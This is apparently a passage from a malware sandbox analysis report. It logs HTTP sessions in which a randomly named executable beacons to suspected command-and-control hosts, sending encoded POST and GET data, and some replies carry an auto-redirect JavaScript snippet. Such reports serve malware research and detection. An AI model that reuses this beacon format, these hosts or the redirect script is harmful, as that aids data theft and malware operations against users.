                                                          User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                          Data Raw: 4b 42 45 68 43 4a 3d 31 45 36 43 37 35 54 5a 70 4a 4e 45 53 37 79 78 4d 4b 56 72 49 48 54 44 44 32 46 41 51 57 75 57 47 2f 63 4c 7a 78 58 6d 50 68 74 56 46 6e 67 58 31 51 54 68 4e 35 45 49 53 63 66 75 4a 45 2b 30 52 67 66 74 61 6a 43 39 68 39 4a 75 30 74 6c 34 76 73 47 4a 52 56 62 39 2f 56 53 53 2b 34 48 41 6e 35 77 6a 62 36 74 76 42 4a 6a 59 2b 75 77 4d 54 77 68 58 73 77 35 34 47 2b 47 7a 37 45 79 7a 32 69 75 4a 62 31 6a 70 42 42 64 6c 57 50 4a 65 74 71 53 36 53 73 34 68 74 5a 55 6f 39 66 69 69 33 67 4f 72 55 41 43 38 4b 44 49 77 55 55 67 6f 7a 32 74 44 39 57 2f 32 69 69 4a 77 37 77 62 39 6b 4c 47 42 56 48 45 3d
                                                          Data Ascii: KBEhCJ=1E6C75TZpJNES7yxMKVrIHTDD2FAQWuWG/cLzxXmPhtVFngX1QThN5EIScfuJE+0RgftajC9h9Ju0tl4vsGJRVb9/VSS+4HAn5wjb6tvBJjY+uwMTwhXsw54G+Gz7Eyz2iuJb1jpBBdlWPJetqS6Ss4htZUo9fii3gOrUAC8KDIwUUgoz2tD9W/2iiJw7wb9kLGBVHE=
                                                          Jan 11, 2025 01:41:05.054543018 CET691INHTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Sat, 11 Jan 2025 00:41:04 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 548
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          18192.168.2.54999545.141.156.114803668C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 01:41:07.700984001 CET652OUTPOST /iuvu/ HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 227
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Host: www.logidant.xyz
                                                          Origin: http://www.logidant.xyz
                                                          Referer: http://www.logidant.xyz/iuvu/
                                                          User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                          Data Raw: 4b 42 45 68 43 4a 3d 31 45 36 43 37 35 54 5a 70 4a 4e 45 53 62 43 78 4c 74 68 72 42 48 54 63 4e 57 46 41 65 32 76 66 47 2f 59 4c 7a 7a 36 37 4f 54 35 56 47 46 6f 58 30 53 72 68 41 5a 45 49 4b 4d 66 72 55 55 2b 39 52 67 54 66 61 6d 36 39 68 38 74 75 30 6f 68 34 76 62 79 4b 58 46 62 2f 33 31 53 55 77 59 48 41 6e 35 77 6a 62 36 34 41 42 4a 37 59 2b 2b 41 4d 53 54 35 59 6b 51 35 35 42 2b 47 7a 2f 45 79 33 32 69 75 52 62 33 62 54 42 48 5a 6c 57 4f 35 65 74 34 71 35 62 73 34 76 77 70 56 64 37 61 50 31 75 7a 2f 71 58 67 7a 75 63 43 63 4b 59 43 52 43 70 55 6c 72 75 32 54 4f 79 78 42 48 71 41 36 55 2b 6f 57 78 4c 51 51 4b 59 63 42 75 48 36 76 61 4a 67 72 41 6b 36 4b 61 50 59 46 55
                                                          Data Ascii: KBEhCJ=1E6C75TZpJNESbCxLthrBHTcNWFAe2vfG/YLzz67OT5VGFoX0SrhAZEIKMfrUU+9RgTfam69h8tu0oh4vbyKXFb/31SUwYHAn5wjb64ABJ7Y++AMST5YkQ55B+Gz/Ey32iuRb3bTBHZlWO5et4q5bs4vwpVd7aP1uz/qXgzucCcKYCRCpUlru2TOyxBHqA6U+oWxLQQKYcBuH6vaJgrAk6KaPYFU
                                                          Jan 11, 2025 01:41:08.353347063 CET691INHTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Sat, 11 Jan 2025 00:41:08 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 548
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          19192.168.2.54999645.141.156.114803668C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 01:41:10.248625040 CET1669OUTPOST /iuvu/ HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 1243
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Host: www.logidant.xyz
                                                          Origin: http://www.logidant.xyz
                                                          Referer: http://www.logidant.xyz/iuvu/
                                                          User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                          Data Raw: 4b 42 45 68 43 4a 3d 31 45 36 43 37 35 54 5a 70 4a 4e 45 53 62 43 78 4c 74 68 72 42 48 54 63 4e 57 46 41 65 32 76 66 47 2f 59 4c 7a 7a 36 37 4f 53 42 56 47 32 77 58 30 7a 72 68 42 5a 45 49 55 63 66 71 55 55 2f 2f 52 67 4c 62 61 6d 6d 44 68 2b 6c 75 79 4b 70 34 6e 4b 79 4b 65 46 62 2f 6f 6c 53 52 2b 34 48 5a 6e 39 63 6e 62 36 6f 41 42 4a 37 59 2b 34 6b 4d 47 77 68 59 69 51 35 34 47 2b 48 79 37 45 79 66 32 69 32 42 62 78 48 44 42 58 35 6c 58 74 42 65 76 4c 53 35 48 38 35 4a 67 35 56 46 37 61 4b 79 75 7a 69 52 58 67 32 37 63 45 73 4b 59 44 30 42 35 46 42 7a 7a 48 4c 7a 78 6a 35 52 32 31 69 69 38 4a 71 32 4e 6a 38 75 51 59 5a 2b 48 63 50 34 50 78 69 38 6d 75 4f 7a 47 4e 6f 46 5a 69 32 46 55 30 45 36 30 43 6c 39 54 6c 54 4d 35 4b 2b 2b 56 50 78 65 61 6a 39 53 34 6b 54 4b 69 6e 6b 4b 6a 50 6e 6e 6f 4f 53 2f 6e 30 53 52 4b 37 62 61 30 43 62 69 58 41 64 34 62 34 76 71 31 47 4e 6a 74 49 32 77 5a 69 38 74 6c 39 50 2b 30 77 33 4f 76 70 4b 78 6d 63 69 6b 42 31 7a 76 32 2f 74 54 31 38 6e 66 41 61 4a 49 6b 4a 51 [TRUNCATED]
                                                          Data Ascii: KBEhCJ=1E6C75TZpJNESbCxLthrBHTcNWFAe2vfG/YLzz67OSBVG2wX0zrhBZEIUcfqUU//RgLbammDh+luyKp4nKyKeFb/olSR+4HZn9cnb6oABJ7Y+4kMGwhYiQ54G+Hy7Eyf2i2BbxHDBX5lXtBevLS5H85Jg5VF7aKyuziRXg27cEsKYD0B5FBzzHLzxj5R21ii8Jq2Nj8uQYZ+HcP4Pxi8muOzGNoFZi2FU0E60Cl9TlTM5K++VPxeaj9S4kTKinkKjPnnoOS/n0SRK7ba0CbiXAd4b4vq1GNjtI2wZi8tl9P+0w3OvpKxmcikB1zv2/tT18nfAaJIkJQo0xywPUAF2J+bw3aSn8/suMT4v+H7JbiywjYUN8COYgT2FbUMC+/uCwYPynE7p34GXEa9Uuz0PPxr1uUAXoO6wCKN9D0s5FP6xYuBTEjZlbdnyEctfqEQz+8hoso2aE+hhG0/Cy2rdoEQ+nO9gSW5LHiPkDk07kyLh3pu188dc7EEulV8r5PbDu/XUVAWVXd02qoQktx0O3PY2QjSrK1a41XDvioddg+BpTkFjY+v+DzVJI50lB/dG7RBj1jFfCD1hpU8Bod7dv7TRvd6RJEDssDs3RXEixf9pTIMDKSx/ttdvtuktqdkyqr0qZzeIh50D+rI/W3QLpAzODKlXdZ/XaMTc+U0nAcvYOnznxJbmyk+6t0zZhbbW9Wl/8u6vSqEP3QxBkgt4jRrVAJyJdhCidSHxWqhTdhNKxtqt4vm/ghI5D5AZFnrzFKmNtsbQ4RCpVAO7jfOleXnNf9mIcYIIXCCFx4k8nHUfzSczYcurpieLNCvROd2mmLjoU8FfILO3pz4M1+zOZzcCY5M6bC8q0BsMsS2M+ZRqgX4EPJUkPhRDqL7xJ45hdLs28xhtC6mQmoESlMImPp5dPxj3bp+KnH+6S9X4Me+cHdF7mrXCMSD+mKiLrdy9yWLBHzrUa+msSvMhDe7owypIfkli1ruLC8GvPaeLWVFM [TRUNCATED]
                                                          Jan 11, 2025 01:41:10.924496889 CET691INHTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Sat, 11 Jan 2025 00:41:10 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 548
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          20192.168.2.54999745.141.156.114803668C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 01:41:12.794153929 CET377OUTGET /iuvu/?KBEhCJ=4GSi4NjhieA+eby0NKQzTEPCPA5td1TZNopVgGr+MixqN2kv+x7vZ9YkKN38Qwr7I1LnRiqAhNhB07BIn5ynY1PA81WB0aqcrP8TCrRqA4T6i/Y0YCRnlTl6YfLJ6nzbiw==&Kdr=RN-HMNoXj6pXm HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Connection: close
                                                          Host: www.logidant.xyz
                                                          User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                          Jan 11, 2025 01:41:13.641216993 CET691INHTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Sat, 11 Jan 2025 00:41:13 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 548
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          21192.168.2.54999827.124.4.246803668C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 01:41:19.241024017 CET632OUTPOST /36be/ HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 207
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Host: www.laohub10.net
                                                          Origin: http://www.laohub10.net
                                                          Referer: http://www.laohub10.net/36be/
                                                          User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                          Data Raw: 4b 42 45 68 43 4a 3d 2b 52 57 2f 42 36 57 30 66 4b 6d 61 64 49 78 36 6f 50 76 73 4d 2b 30 43 6c 59 47 50 47 50 54 78 32 4e 6d 46 75 69 6b 75 41 56 71 4b 63 2b 4a 33 31 7a 49 4c 77 35 31 64 6c 64 42 35 73 4d 36 31 47 50 32 4b 38 72 6f 73 38 45 2b 71 2f 69 79 4a 42 66 34 39 33 41 56 45 70 2f 6a 4c 59 53 79 33 36 4f 7a 30 69 61 62 50 4e 5a 46 36 58 2f 77 46 4d 61 53 6f 58 48 33 54 67 32 66 70 6f 78 71 65 71 53 59 47 35 32 4b 39 74 32 2b 78 43 63 48 68 76 67 2b 4c 4e 73 6d 75 46 47 71 43 49 69 6f 54 4f 32 67 62 6f 71 4a 33 35 38 65 70 2b 75 73 45 31 64 4b 48 4c 71 35 79 42 79 41 71 55 6d 30 7a 36 75 61 44 70 78 55 3d
                                                          Data Ascii: KBEhCJ=+RW/B6W0fKmadIx6oPvsM+0ClYGPGPTx2NmFuikuAVqKc+J31zILw51dldB5sM61GP2K8ros8E+q/iyJBf493AVEp/jLYSy36Oz0iabPNZF6X/wFMaSoXH3Tg2fpoxqeqSYG52K9t2+xCcHhvg+LNsmuFGqCIioTO2gboqJ358ep+usE1dKHLq5yByAqUm0z6uaDpxU=
                                                          Jan 11, 2025 01:41:20.034018993 CET533INHTTP/1.1 200 OK
                                                          Server: Apache
                                                          Content-Type: text/html; charset=utf-8
                                                          Accept-Ranges: bytes
                                                          Cache-Control: max-age=86400
                                                          Age: 1
                                                          Connection: Close
                                                          Content-Length: 358
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 77 6e 2d 73 7a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 [TRUNCATED]
                                                          Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://down-sz.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          22192.168.2.54999927.124.4.246803668C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 01:41:21.791549921 CET652OUTPOST /36be/ HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 227
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Host: www.laohub10.net
                                                          Origin: http://www.laohub10.net
                                                          Referer: http://www.laohub10.net/36be/
                                                          User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                          Data Raw: 4b 42 45 68 43 4a 3d 2b 52 57 2f 42 36 57 30 66 4b 6d 61 62 6f 68 36 6b 4a 6e 73 5a 4f 30 44 35 6f 47 50 4a 76 53 32 32 4e 36 46 75 6d 56 6c 42 6e 2b 4b 62 66 35 33 32 78 77 4c 39 5a 31 64 71 39 42 38 69 73 37 33 47 50 79 73 38 75 41 73 38 41 65 71 2f 6e 4f 4a 42 4f 34 2b 30 77 56 47 77 76 6a 4a 63 53 79 33 36 4f 7a 30 69 65 4c 70 4e 64 70 36 55 4f 41 46 4e 37 53 6e 5a 6e 33 55 33 47 66 70 6a 52 71 61 71 53 59 77 35 7a 53 62 74 77 36 78 43 65 66 68 76 31 65 4d 61 38 6d 30 4c 6d 72 67 43 48 59 57 4c 32 34 77 74 49 4d 75 70 39 71 53 2f 59 64 75 76 2f 43 76 59 4b 56 4b 52 68 49 64 46 57 56 61 67 4e 4b 7a 33 6d 41 78 50 42 36 37 69 68 65 45 46 7a 69 34 43 7a 76 48 57 47 33 6b
                                                          Data Ascii: KBEhCJ=+RW/B6W0fKmaboh6kJnsZO0D5oGPJvS22N6FumVlBn+Kbf532xwL9Z1dq9B8is73GPys8uAs8Aeq/nOJBO4+0wVGwvjJcSy36Oz0ieLpNdp6UOAFN7SnZn3U3GfpjRqaqSYw5zSbtw6xCefhv1eMa8m0LmrgCHYWL24wtIMup9qS/Yduv/CvYKVKRhIdFWVagNKz3mAxPB67iheEFzi4CzvHWG3k
                                                          Jan 11, 2025 01:41:22.566281080 CET533INHTTP/1.1 200 OK
                                                          Server: Apache
                                                          Content-Type: text/html; charset=utf-8
                                                          Accept-Ranges: bytes
                                                          Cache-Control: max-age=86400
                                                          Age: 1
                                                          Connection: Close
                                                          Content-Length: 358
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 77 6e 2d 73 7a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 [TRUNCATED]
                                                          Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://down-sz.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          23192.168.2.55000027.124.4.246803668C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 01:41:24.346798897 CET1669OUTPOST /36be/ HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 1243
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Host: www.laohub10.net
                                                          Origin: http://www.laohub10.net
                                                          Referer: http://www.laohub10.net/36be/
                                                          User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                          Data Raw: 4b 42 45 68 43 4a 3d 2b 52 57 2f 42 36 57 30 66 4b 6d 61 62 6f 68 36 6b 4a 6e 73 5a 4f 30 44 35 6f 47 50 4a 76 53 32 32 4e 36 46 75 6d 56 6c 42 6e 47 4b 62 6f 52 33 31 57 63 4c 38 5a 31 64 6a 64 42 39 69 73 37 32 47 50 4b 6f 38 75 46 62 38 43 6d 71 2b 46 32 4a 51 4d 41 2b 76 67 56 47 74 2f 6a 55 59 53 79 59 36 4f 6a 34 69 61 58 70 4e 64 70 36 55 4e 6f 46 4e 71 53 6e 4a 58 33 54 67 32 66 74 6f 78 71 79 71 53 41 67 35 79 6e 6d 74 6a 79 78 44 2b 50 68 6a 68 2b 4d 46 4d 6d 71 47 47 72 47 43 48 64 47 4c 32 55 57 74 4a 34 45 70 36 47 53 2b 63 38 33 71 73 44 30 61 73 52 59 55 41 59 39 59 32 49 39 72 73 36 32 36 68 73 75 43 43 4b 30 30 42 6d 61 4a 79 62 73 5a 55 75 57 53 53 57 45 64 43 45 6f 2b 36 58 30 34 42 33 39 6e 75 4e 56 39 33 41 58 76 41 33 55 33 51 43 43 53 74 78 42 59 36 4b 54 56 4b 4d 35 38 31 7a 4c 68 73 38 46 34 42 30 77 73 53 69 66 4d 76 71 6b 68 43 61 67 75 4f 69 67 77 77 41 79 53 48 66 30 4b 35 4a 71 77 61 76 5a 70 59 68 4b 63 6d 79 54 7a 4b 54 57 78 33 4d 51 54 48 6e 4e 6a 49 32 54 42 67 2b [TRUNCATED]
